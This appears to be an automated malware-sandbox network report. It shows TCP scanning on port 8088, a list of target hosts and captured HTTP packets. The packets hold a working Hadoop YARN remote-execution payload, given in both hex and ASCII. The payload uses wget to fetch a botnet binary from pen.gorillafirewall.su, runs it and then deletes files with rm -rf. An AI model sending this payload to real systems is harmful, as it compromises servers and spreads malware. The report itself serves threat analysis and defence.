                                                                                                Sep 12, 2024 00:39:15.096018076 CEST3824144202154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:39:15.096102953 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:15.143017054 CEST355588088192.168.2.23142.172.118.111
                                                                                                Sep 12, 2024 00:39:15.181906939 CEST808835558142.172.118.111192.168.2.23
                                                                                                Sep 12, 2024 00:39:15.234850883 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:15.554805994 CEST5956838241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:39:15.906810999 CEST543948088192.168.2.23112.144.139.77
                                                                                                Sep 12, 2024 00:39:15.948071957 CEST808854394112.144.139.77192.168.2.23
                                                                                                Sep 12, 2024 00:39:15.948159933 CEST543948088192.168.2.23112.144.139.77
                                                                                                Sep 12, 2024 00:39:16.956008911 CEST808854394112.144.139.77192.168.2.23
                                                                                                Sep 12, 2024 00:39:16.956084013 CEST543948088192.168.2.23112.144.139.77
                                                                                                Sep 12, 2024 00:39:17.214637995 CEST808858836182.203.244.103192.168.2.23
                                                                                                Sep 12, 2024 00:39:17.214734077 CEST588368088192.168.2.23182.203.244.103
                                                                                                Sep 12, 2024 00:39:17.794507980 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:17.894182920 CEST543948088192.168.2.23112.144.139.77
                                                                                                Sep 12, 2024 00:39:17.894560099 CEST389428088192.168.2.2394.201.90.86
                                                                                                Sep 12, 2024 00:39:17.924797058 CEST808854394112.144.139.77192.168.2.23
                                                                                                Sep 12, 2024 00:39:17.924988031 CEST80883894294.201.90.86192.168.2.23
                                                                                                Sep 12, 2024 00:39:17.925044060 CEST389428088192.168.2.2394.201.90.86
                                                                                                Sep 12, 2024 00:39:17.925137997 CEST808854394112.144.139.77192.168.2.23
                                                                                                Sep 12, 2024 00:39:17.954240084 CEST80883894294.201.90.86192.168.2.23
                                                                                                Sep 12, 2024 00:39:17.958436966 CEST389428088192.168.2.2394.201.90.86
                                                                                                Sep 12, 2024 00:39:19.452092886 CEST808851444204.235.25.185192.168.2.23
                                                                                                Sep 12, 2024 00:39:19.452208042 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:19.496571064 CEST808851444204.235.25.185192.168.2.23
                                                                                                Sep 12, 2024 00:39:19.498261929 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:19.590233088 CEST5956838241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:39:20.896015882 CEST389428088192.168.2.2394.201.90.86
                                                                                                Sep 12, 2024 00:39:20.896424055 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:21.134041071 CEST389428088192.168.2.2394.201.90.86
                                                                                                Sep 12, 2024 00:39:21.373992920 CEST389428088192.168.2.2394.201.90.86
                                                                                                Sep 12, 2024 00:39:21.857918024 CEST389428088192.168.2.2394.201.90.86
                                                                                                Sep 12, 2024 00:39:21.921940088 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:21.961169004 CEST80884247831.240.32.116192.168.2.23
                                                                                                Sep 12, 2024 00:39:21.961280107 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:22.817842007 CEST389428088192.168.2.2394.201.90.86
                                                                                                Sep 12, 2024 00:39:22.901843071 CEST80883894294.201.90.86192.168.2.23
                                                                                                Sep 12, 2024 00:39:22.967931032 CEST80884247831.240.32.116192.168.2.23
                                                                                                Sep 12, 2024 00:39:22.967983007 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:23.013046980 CEST80884247831.240.32.116192.168.2.23
                                                                                                Sep 12, 2024 00:39:23.013761044 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:23.899571896 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:23.900094986 CEST375008088192.168.2.23201.48.232.174
                                                                                                Sep 12, 2024 00:39:24.141633987 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:24.385574102 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:24.453568935 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:24.489346981 CEST808851444204.235.25.185192.168.2.23
                                                                                                Sep 12, 2024 00:39:24.897512913 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:24.929543018 CEST375008088192.168.2.23201.48.232.174
                                                                                                Sep 12, 2024 00:39:25.336752892 CEST80884247831.240.32.116192.168.2.23
                                                                                                Sep 12, 2024 00:39:25.336834908 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:25.545557022 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:25.889390945 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:26.497301102 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:26.561415911 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:26.903359890 CEST356928088192.168.2.23116.61.241.191
                                                                                                Sep 12, 2024 00:39:27.841167927 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:27.905128956 CEST356928088192.168.2.23116.61.241.191
                                                                                                Sep 12, 2024 00:39:28.577126980 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:28.634602070 CEST382415402493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:39:28.634730101 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:28.636200905 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:28.667994022 CEST80884247831.240.32.116192.168.2.23
                                                                                                Sep 12, 2024 00:39:28.668071032 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:28.901025057 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:29.188966036 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:29.572894096 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:29.659954071 CEST382415402493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:39:29.660103083 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:29.728915930 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:29.907383919 CEST533968088192.168.2.2322.172.178.76
                                                                                                Sep 12, 2024 00:39:30.784756899 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:30.912704945 CEST533968088192.168.2.2322.172.178.76
                                                                                                Sep 12, 2024 00:39:30.948200941 CEST80885339622.172.178.76192.168.2.23
                                                                                                Sep 12, 2024 00:39:30.948379040 CEST533968088192.168.2.2322.172.178.76
                                                                                                Sep 12, 2024 00:39:30.992887020 CEST80885339622.172.178.76192.168.2.23
                                                                                                Sep 12, 2024 00:39:30.996745110 CEST533968088192.168.2.2322.172.178.76
                                                                                                Sep 12, 2024 00:39:31.244113922 CEST80885339622.172.178.76192.168.2.23
                                                                                                Sep 12, 2024 00:39:31.244252920 CEST533968088192.168.2.2322.172.178.76
                                                                                                Sep 12, 2024 00:39:31.672059059 CEST382415402493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:39:31.672267914 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:31.872603893 CEST424788088192.168.2.2331.240.32.116
                                                                                                Sep 12, 2024 00:39:31.908624887 CEST80884247831.240.32.116192.168.2.23
                                                                                                Sep 12, 2024 00:39:32.896522045 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:32.909390926 CEST533968088192.168.2.2322.172.178.76
                                                                                                Sep 12, 2024 00:39:32.910007954 CEST506588088192.168.2.2349.179.51.163
                                                                                                Sep 12, 2024 00:39:32.944953918 CEST80885065849.179.51.163192.168.2.23
                                                                                                Sep 12, 2024 00:39:32.945055962 CEST506588088192.168.2.2349.179.51.163
                                                                                                Sep 12, 2024 00:39:33.148457050 CEST533968088192.168.2.2322.172.178.76
                                                                                                Sep 12, 2024 00:39:33.388477087 CEST533968088192.168.2.2322.172.178.76
                                                                                                Sep 12, 2024 00:39:33.888374090 CEST533968088192.168.2.2322.172.178.76
                                                                                                Sep 12, 2024 00:39:33.929534912 CEST80885339622.172.178.76192.168.2.23
                                                                                                Sep 12, 2024 00:39:33.975969076 CEST80885065849.179.51.163192.168.2.23
                                                                                                Sep 12, 2024 00:39:33.976108074 CEST506588088192.168.2.2349.179.51.163
                                                                                                Sep 12, 2024 00:39:35.832190990 CEST382415402493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:39:35.832285881 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:35.911643028 CEST506588088192.168.2.2349.179.51.163
                                                                                                Sep 12, 2024 00:39:35.912122011 CEST403668088192.168.2.23190.32.31.149
                                                                                                Sep 12, 2024 00:39:35.953685999 CEST80885065849.179.51.163192.168.2.23
                                                                                                Sep 12, 2024 00:39:35.955410957 CEST80885065849.179.51.163192.168.2.23
                                                                                                Sep 12, 2024 00:39:36.931956053 CEST403668088192.168.2.23190.32.31.149
                                                                                                Sep 12, 2024 00:39:37.247912884 CEST5402438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:37.282248974 CEST382415402493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:39:37.283365965 CEST382415402493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:39:38.286055088 CEST3391038241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:39:38.914746046 CEST359008088192.168.2.23155.39.86.162
                                                                                                Sep 12, 2024 00:39:39.295600891 CEST3391038241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:39:39.935564995 CEST359008088192.168.2.23155.39.86.162
                                                                                                Sep 12, 2024 00:39:41.311439991 CEST3391038241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:39:41.360488892 CEST382413391045.202.35.64192.168.2.23
                                                                                                Sep 12, 2024 00:39:41.360673904 CEST3391038241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:39:41.361756086 CEST3391038241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:39:41.615292072 CEST3391038241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:39:41.871285915 CEST3391038241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:39:41.917399883 CEST604748088192.168.2.23219.253.93.123
                                                                                                Sep 12, 2024 00:39:41.960300922 CEST808860474219.253.93.123192.168.2.23
                                                                                                Sep 12, 2024 00:39:41.960383892 CEST604748088192.168.2.23219.253.93.123
                                                                                                Sep 12, 2024 00:39:42.396086931 CEST382413391045.202.35.64192.168.2.23
                                                                                                Sep 12, 2024 00:39:42.396152973 CEST3391038241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:39:42.399158001 CEST3391038241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:39:42.454181910 CEST382413391045.202.35.64192.168.2.23
                                                                                                Sep 12, 2024 00:39:42.454293013 CEST3391038241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:39:42.501173019 CEST382413391045.202.35.64192.168.2.23
                                                                                                Sep 12, 2024 00:39:42.972012997 CEST808860474219.253.93.123192.168.2.23
                                                                                                Sep 12, 2024 00:39:42.972104073 CEST604748088192.168.2.23219.253.93.123
                                                                                                Sep 12, 2024 00:39:43.456603050 CEST4426438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:43.497811079 CEST3824144264154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:39:43.497901917 CEST4426438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:43.541707039 CEST3824144264154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:39:43.543006897 CEST4426438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:43.788060904 CEST3824144264154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:39:43.788152933 CEST4426438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:43.903008938 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:44.919136047 CEST604748088192.168.2.23219.253.93.123
                                                                                                Sep 12, 2024 00:39:44.919845104 CEST574308088192.168.2.23186.99.201.69
                                                                                                Sep 12, 2024 00:39:44.980887890 CEST808857430186.99.201.69192.168.2.23
                                                                                                Sep 12, 2024 00:39:44.980977058 CEST574308088192.168.2.23186.99.201.69
                                                                                                Sep 12, 2024 00:39:44.984040022 CEST808860474219.253.93.123192.168.2.23
                                                                                                Sep 12, 2024 00:39:44.984108925 CEST604748088192.168.2.23219.253.93.123
                                                                                                Sep 12, 2024 00:39:45.034754992 CEST808857430186.99.201.69192.168.2.23
                                                                                                Sep 12, 2024 00:39:45.041007042 CEST808860474219.253.93.123192.168.2.23
                                                                                                Sep 12, 2024 00:39:45.042821884 CEST604748088192.168.2.23219.253.93.123
                                                                                                Sep 12, 2024 00:39:45.042821884 CEST574308088192.168.2.23186.99.201.69
                                                                                                Sep 12, 2024 00:39:45.166800022 CEST604748088192.168.2.23219.253.93.123
                                                                                                Sep 12, 2024 00:39:45.414783955 CEST604748088192.168.2.23219.253.93.123
                                                                                                Sep 12, 2024 00:39:45.460468054 CEST4426438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:45.460505009 CEST4426438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:45.558753967 CEST4426438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:45.806740999 CEST4426438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:45.922692060 CEST604748088192.168.2.23219.253.93.123
                                                                                                Sep 12, 2024 00:39:45.979192019 CEST808860474219.253.93.123192.168.2.23
                                                                                                Sep 12, 2024 00:39:46.302670002 CEST4426438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:46.341799974 CEST3824144264154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:39:46.462430954 CEST5959838241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:39:47.486546993 CEST5959838241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:39:47.921823025 CEST574308088192.168.2.23186.99.201.69
                                                                                                Sep 12, 2024 00:39:47.922518015 CEST568388088192.168.2.23109.161.191.41
                                                                                                Sep 12, 2024 00:39:48.194422960 CEST574308088192.168.2.23186.99.201.69
                                                                                                Sep 12, 2024 00:39:48.478420973 CEST574308088192.168.2.23186.99.201.69
                                                                                                Sep 12, 2024 00:39:48.927433968 CEST568388088192.168.2.23109.161.191.41
                                                                                                Sep 12, 2024 00:39:48.975482941 CEST808856838109.161.191.41192.168.2.23
                                                                                                Sep 12, 2024 00:39:48.975569010 CEST568388088192.168.2.23109.161.191.41
                                                                                                Sep 12, 2024 00:39:49.022335052 CEST574308088192.168.2.23186.99.201.69
                                                                                                Sep 12, 2024 00:39:49.022898912 CEST808856838109.161.191.41192.168.2.23
                                                                                                Sep 12, 2024 00:39:49.026355982 CEST568388088192.168.2.23109.161.191.41
                                                                                                Sep 12, 2024 00:39:49.272150993 CEST808856838109.161.191.41192.168.2.23
                                                                                                Sep 12, 2024 00:39:49.272305012 CEST568388088192.168.2.23109.161.191.41
                                                                                                Sep 12, 2024 00:39:49.502351046 CEST5959838241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:39:49.524178028 CEST808856838109.161.191.41192.168.2.23
                                                                                                Sep 12, 2024 00:39:49.524281025 CEST568388088192.168.2.23109.161.191.41
                                                                                                Sep 12, 2024 00:39:50.110136986 CEST574308088192.168.2.23186.99.201.69
                                                                                                Sep 12, 2024 00:39:50.159395933 CEST808857430186.99.201.69192.168.2.23
                                                                                                Sep 12, 2024 00:39:50.924696922 CEST568388088192.168.2.23109.161.191.41
                                                                                                Sep 12, 2024 00:39:50.925437927 CEST405388088192.168.2.2362.49.198.58
                                                                                                Sep 12, 2024 00:39:50.965230942 CEST80884053862.49.198.58192.168.2.23
                                                                                                Sep 12, 2024 00:39:50.965468884 CEST405388088192.168.2.2362.49.198.58
                                                                                                Sep 12, 2024 00:39:51.198333025 CEST568388088192.168.2.23109.161.191.41
                                                                                                Sep 12, 2024 00:39:51.237735033 CEST808856838109.161.191.41192.168.2.23
                                                                                                Sep 12, 2024 00:39:51.993093014 CEST80884053862.49.198.58192.168.2.23
                                                                                                Sep 12, 2024 00:39:51.993156910 CEST405388088192.168.2.2362.49.198.58
                                                                                                Sep 12, 2024 00:39:52.050986052 CEST80884053862.49.198.58192.168.2.23
                                                                                                Sep 12, 2024 00:39:52.053915024 CEST405388088192.168.2.2362.49.198.58
                                                                                                Sep 12, 2024 00:39:53.629698992 CEST5959838241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:39:53.927592039 CEST405388088192.168.2.2362.49.198.58
                                                                                                Sep 12, 2024 00:39:53.928571939 CEST366628088192.168.2.23152.160.225.174
                                                                                                Sep 12, 2024 00:39:53.972052097 CEST80884053862.49.198.58192.168.2.23
                                                                                                Sep 12, 2024 00:39:54.012180090 CEST3824144202154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:39:54.012326956 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:54.941621065 CEST366628088192.168.2.23152.160.225.174
                                                                                                Sep 12, 2024 00:39:56.931658983 CEST473208088192.168.2.2377.210.59.160
                                                                                                Sep 12, 2024 00:39:57.949141026 CEST473208088192.168.2.2377.210.59.160
                                                                                                Sep 12, 2024 00:39:57.992328882 CEST80884732077.210.59.160192.168.2.23
                                                                                                Sep 12, 2024 00:39:57.992537022 CEST473208088192.168.2.2377.210.59.160
                                                                                                Sep 12, 2024 00:39:59.004038095 CEST80884732077.210.59.160192.168.2.23
                                                                                                Sep 12, 2024 00:39:59.007869959 CEST473208088192.168.2.2377.210.59.160
                                                                                                Sep 12, 2024 00:39:59.042926073 CEST80884732077.210.59.160192.168.2.23
                                                                                                Sep 12, 2024 00:39:59.051862001 CEST473208088192.168.2.2377.210.59.160
                                                                                                Sep 12, 2024 00:39:59.478899002 CEST5405438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:39:59.935394049 CEST473208088192.168.2.2377.210.59.160
                                                                                                Sep 12, 2024 00:39:59.941798925 CEST497888088192.168.2.23154.59.31.127
                                                                                                Sep 12, 2024 00:39:59.974836111 CEST80884732077.210.59.160192.168.2.23
                                                                                                Sep 12, 2024 00:40:00.512759924 CEST5405438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:40:00.956736088 CEST497888088192.168.2.23154.59.31.127
                                                                                                Sep 12, 2024 00:40:02.524882078 CEST5405438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:40:02.946757078 CEST528608088192.168.2.23129.177.89.220
                                                                                                Sep 12, 2024 00:40:03.964293957 CEST528608088192.168.2.23129.177.89.220
                                                                                                Sep 12, 2024 00:40:05.969912052 CEST414668088192.168.2.23253.185.142.162
                                                                                                Sep 12, 2024 00:40:06.683912039 CEST5405438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:40:06.971901894 CEST414668088192.168.2.23253.185.142.162
                                                                                                Sep 12, 2024 00:40:08.976659060 CEST394068088192.168.2.23137.226.163.11
                                                                                                Sep 12, 2024 00:40:09.979487896 CEST394068088192.168.2.23137.226.163.11
                                                                                                Sep 12, 2024 00:40:11.978724003 CEST583368088192.168.2.23140.203.230.141
                                                                                                Sep 12, 2024 00:40:12.026078939 CEST808858336140.203.230.141192.168.2.23
                                                                                                Sep 12, 2024 00:40:12.026176929 CEST583368088192.168.2.23140.203.230.141
                                                                                                Sep 12, 2024 00:40:12.489370108 CEST3394238241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:40:13.048275948 CEST808858336140.203.230.141192.168.2.23
                                                                                                Sep 12, 2024 00:40:13.048362017 CEST583368088192.168.2.23140.203.230.141
                                                                                                Sep 12, 2024 00:40:13.498986006 CEST3394238241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:40:14.979958057 CEST583368088192.168.2.23140.203.230.141
                                                                                                Sep 12, 2024 00:40:14.980564117 CEST440808088192.168.2.238.182.34.156
                                                                                                Sep 12, 2024 00:40:15.230771065 CEST583368088192.168.2.23140.203.230.141
                                                                                                Sep 12, 2024 00:40:15.482733965 CEST583368088192.168.2.23140.203.230.141
                                                                                                Sep 12, 2024 00:40:15.514872074 CEST3394238241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:40:15.994682074 CEST583368088192.168.2.23140.203.230.141
                                                                                                Sep 12, 2024 00:40:15.994712114 CEST440808088192.168.2.238.182.34.156
                                                                                                Sep 12, 2024 00:40:17.018528938 CEST583368088192.168.2.23140.203.230.141
                                                                                                Sep 12, 2024 00:40:17.062745094 CEST808858336140.203.230.141192.168.2.23
                                                                                                Sep 12, 2024 00:40:17.063687086 CEST808858336140.203.230.141192.168.2.23
                                                                                                Sep 12, 2024 00:40:17.982201099 CEST565048088192.168.2.2332.181.180.75
                                                                                                Sep 12, 2024 00:40:18.015111923 CEST80885650432.181.180.75192.168.2.23
                                                                                                Sep 12, 2024 00:40:18.015187979 CEST565048088192.168.2.2332.181.180.75
                                                                                                Sep 12, 2024 00:40:18.059634924 CEST80885650432.181.180.75192.168.2.23
                                                                                                Sep 12, 2024 00:40:18.062367916 CEST565048088192.168.2.2332.181.180.75
                                                                                                Sep 12, 2024 00:40:18.714324951 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:40:18.751493931 CEST808841746254.30.40.98192.168.2.23
                                                                                                Sep 12, 2024 00:40:19.742201090 CEST3394238241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:40:20.984736919 CEST565048088192.168.2.2332.181.180.75
                                                                                                Sep 12, 2024 00:40:20.985588074 CEST469968088192.168.2.23117.161.23.95
                                                                                                Sep 12, 2024 00:40:21.221981049 CEST565048088192.168.2.2332.181.180.75
                                                                                                Sep 12, 2024 00:40:21.461941957 CEST565048088192.168.2.2332.181.180.75
                                                                                                Sep 12, 2024 00:40:21.514518023 CEST80885650432.181.180.75192.168.2.23
                                                                                                Sep 12, 2024 00:40:22.009890079 CEST469968088192.168.2.23117.161.23.95

                                                                                                HTTP Request Dependency Graph

                                                                                                • 133.194.79.118:8088
                                                                                                • 78.220.79.118:8088
                                                                                                • 52.160.110.126:8088
                                                                                                • 138.85.232.54:8088
                                                                                                • 82.207.23.152:8088
                                                                                                • 100.179.115.147:8088
                                                                                                • 103.108.227.184:8088
                                                                                                • 244.58.211.204:8088
                                                                                                • 99.17.152.234:8088
                                                                                                • 199.119.126.228:8088
                                                                                                • 123.191.93.71:8088
                                                                                                • 254.41.12.18:8088
                                                                                                • 213.49.53.56:8088
                                                                                                • 91.185.226.47:8088
                                                                                                • 187.125.238.133:8088
                                                                                                • 33.247.222.246:8088
                                                                                                • 182.203.244.103:8088
                                                                                                • 114.142.230.93:8088
                                                                                                • 208.35.19.171:8088
                                                                                                • 118.143.223.55:8088
                                                                                                • 157.173.158.186:8088
                                                                                                • 61.221.100.106:8088
                                                                                                • 184.87.98.222:8088
                                                                                                • 81.209.218.53:8088
                                                                                                • 197.159.201.249:8088
                                                                                                • 192.126.40.239:8088
                                                                                                • 204.235.25.185:8088
                                                                                                • 254.30.40.98:8088
                                                                                                • 142.172.118.111:8088
                                                                                                • 112.144.139.77:8088
                                                                                                • 94.201.90.86:8088
                                                                                                • 31.240.32.116:8088
                                                                                                • 22.172.178.76:8088
                                                                                                • 49.179.51.163:8088
                                                                                                • 219.253.93.123:8088
                                                                                                • 186.99.201.69:8088
                                                                                                • 109.161.191.41:8088
                                                                                                • 62.49.198.58:8088
                                                                                                • 77.210.59.160:8088
                                                                                                • 140.203.230.141:8088
                                                                                                • 32.181.180.75:8088

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                0192.168.2.2348330133.194.79.1188088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:36:56.801903009 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 133.194.79.118:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:36:57.685198069 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 133.194.79.118:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                1192.168.2.233710278.220.79.1188088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:08.811273098 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 78.220.79.118:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:37:09.687568903 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 78.220.79.118:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
